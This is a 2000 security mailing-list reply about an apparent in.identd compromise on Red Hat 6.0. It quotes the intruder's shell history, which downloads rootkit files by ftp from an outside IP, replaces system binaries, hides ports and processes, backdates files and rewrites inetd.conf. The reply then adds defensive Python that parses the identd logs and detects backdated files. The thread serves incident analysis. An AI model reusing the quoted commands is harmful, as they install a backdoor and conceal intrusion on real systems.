Subject: Re: Rooted through in.identd on Red Hat 6.0
From: Jon Burdge (jburdge@AVENTAIL.COM)
Date: Thu Apr 20 2000 - 11:34:39 CDT
- Next message: Vincent Sweeney: "Odd Firewall Entries"
- Previous message: Donald McLachlan: "weird traceroutes"
- Maybe in reply to: Del Elson: "Rooted through in.identd on Red Hat 6.0"
- Maybe reply: Jon Burdge: "Re: Rooted through in.identd on Red Hat 6.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Those requests appear to be the site he ftp'd to (ftp 200.192.58.201 21)
requesting the ident of who he was connecting as. It looks more like it was
just the ftp daemon on the remote site behaving appropriately.
> -----Original Message-----
> From: Del Elson [mailto:del@BABEL.COM.AU]
> Sent: Tuesday, April 18, 2000 10:02 PM
> To: INCIDENTS@SECURITYFOCUS.COM
> Subject: Rooted through in.identd on Red Hat 6.0
>
>
> Hi,
>
> A client was hacked last week by what looked like a buffer
> overflow through in.identd. This was on a Red Hat 6.0
> box.
>
> RH don't have any current security notices or fixes for
> in.identd on their servers, and I haven't seen other
> boxes hacked through in.identd recently.
>
> The hacker left the usual trace in /.bash_history, which
> ran like:
>
> mkdir /usr/lib/... ; cd /usr/lib/...
> ftp 200.192.58.201 21
> cd /usr/lib/...
> mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
> mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
> mv tcpd.gz? tcpd.gz
> gzip -d *
> chmod +x *
> mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
> mv pt07 /usr/lib/; mv pstree /usr/bin ;
> /usr/lib/pt07
> echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ;
> echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
> echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ;
> echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
> touch -t 199910122110 /dev/cui220
> touch -t 199910122110 /dev/cui221
> touch -t 199910122110 /usr/lib/pt07
> touch -t 199910122110 /usr/sbin/syslogd
> touch -t 199910122110 /usr/sbin/tcpd
> touch -t 199910122110 /bin/ps
> touch -t 199910122110 /bin/netstat
> touch -t 199910122110 /usr/bin/pstree
> cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
> mv /tmp/b /etc/inetd.conf
> killall -HUP inetd
>
> ... installing a back door and a partial cover of tracks.
>
> The only messages in /var/log/messages around the time
> were:
>
> Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
> Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
> Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
> Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
>
> ... the IP address traces back to somewhere in Brazil.
>
> Anyone know of any current bug notices, exploits, or
> patches for in.identd?
>
> Del
>
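Two checks a responder could run against the evidence in this thread, written here as an added example and not taken from the thread or from Red Hat's identd. The first parses the identd lines Del quoted: in that log format, `for: 1176, 21` records the RFC 1413 query `1176 , 21` sent by 200.192.58.201, i.e. the remote ftp server asking which local user owned the connection from local port 1176 to its port 21, which is the reading Jon gives. The second addresses the `touch -t 199910122110` lines: touch rewrites atime and mtime, but the kernel still sets ctime to the current time, so a backdated binary shows a ctime far newer than its mtime, and a group of system binaries sharing one identical mtime points at a scripted touch. The log text is the thread's, rejoined onto single lines; the temp files, the port heuristic in `classify_ident_query` and the `min_gap_seconds` threshold are assumptions made for this example.

```python
import os
import re
import tempfile
import time

# Constructed sample: the identd entries from the post, one record per line.
IDENTD_LOG = """\
Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201
Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201
Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21
"""

IDENT_QUERY = re.compile(
    r"identd\[(?P<pid>\d+)\]: from: (?P<src>[\d.]+) .*? for: (?P<local>\d+), (?P<remote>\d+)"
)


def parse_ident_queries(log_text):
    """Return one dict per RFC 1413 query that identd logged.

    'for: A, B' records the query '<A> , <B>' from the remote host: A is the
    port on this host, B is the port on the querier.  The querier wants the
    owner of the TCP connection local:A -> querier:B.
    """
    queries = []
    for line in log_text.splitlines():
        m = IDENT_QUERY.search(line)
        if not m:
            continue
        queries.append({
            "pid": int(m.group("pid")),
            "querier": m.group("src"),
            "local_port": int(m.group("local")),
            "remote_port": int(m.group("remote")),
        })
    return queries


def classify_ident_query(q, server_ports=(21, 25, 113, 6667)):
    """Heuristic (assumption): a query whose remote side is a well-known
    service port and whose local side is an ephemeral port is the reverse
    lookup a server performs when *this* host connected out to it."""
    if q["remote_port"] in server_ports and q["local_port"] >= 1024:
        return "outbound-connection-lookup"
    return "review"


def find_backdated_files(paths, min_gap_seconds=86400):
    """Flag files whose ctime is at least min_gap_seconds newer than their
    mtime (touch -t cannot backdate ctime), and return clusters of files
    that share an identical mtime to the second."""
    flagged = []
    by_mtime = {}
    for p in paths:
        st = os.stat(p)
        if st.st_ctime - st.st_mtime >= min_gap_seconds:
            flagged.append(p)
        by_mtime.setdefault(int(st.st_mtime), []).append(p)
    clusters = [group for group in by_mtime.values() if len(group) > 1]
    return flagged, clusters


def demo_backdated():
    """Constructed demo: three placeholder files in a temp dir, two of them
    given the post's timestamp 1999-10-12 21:10 the way touch -t would."""
    tmpdir = tempfile.mkdtemp()
    backdated = time.mktime(time.strptime("199910122110", "%Y%m%d%H%M"))
    paths = []
    for name in ("ps", "netstat", "untouched"):
        p = os.path.join(tmpdir, name)
        with open(p, "w") as f:
            f.write("placeholder, not a real binary\n")
        paths.append(p)
    for p in paths[:2]:
        os.utime(p, (backdated, backdated))   # sets atime/mtime; ctime becomes "now"
    flagged, clusters = find_backdated_files(paths)
    return ([os.path.basename(p) for p in flagged],
            [[os.path.basename(p) for p in group] for group in clusters])


if __name__ == "__main__":
    for q in parse_ident_queries(IDENTD_LOG):
        print(q, classify_ident_query(q))
    print(demo_backdated())
```

On a real box `find_backdated_files` would be pointed at the paths named in the history (`/bin/ps`, `/bin/netstat`, `/usr/sbin/syslogd`, `/usr/sbin/tcpd`, `/usr/bin/pstree`, `/usr/lib/pt07`); on Red Hat the complementary check is `rpm -V` against the owning packages, since it compares size, MD5 and mtime with the package database rather than trusting the filesystem's own timestamps.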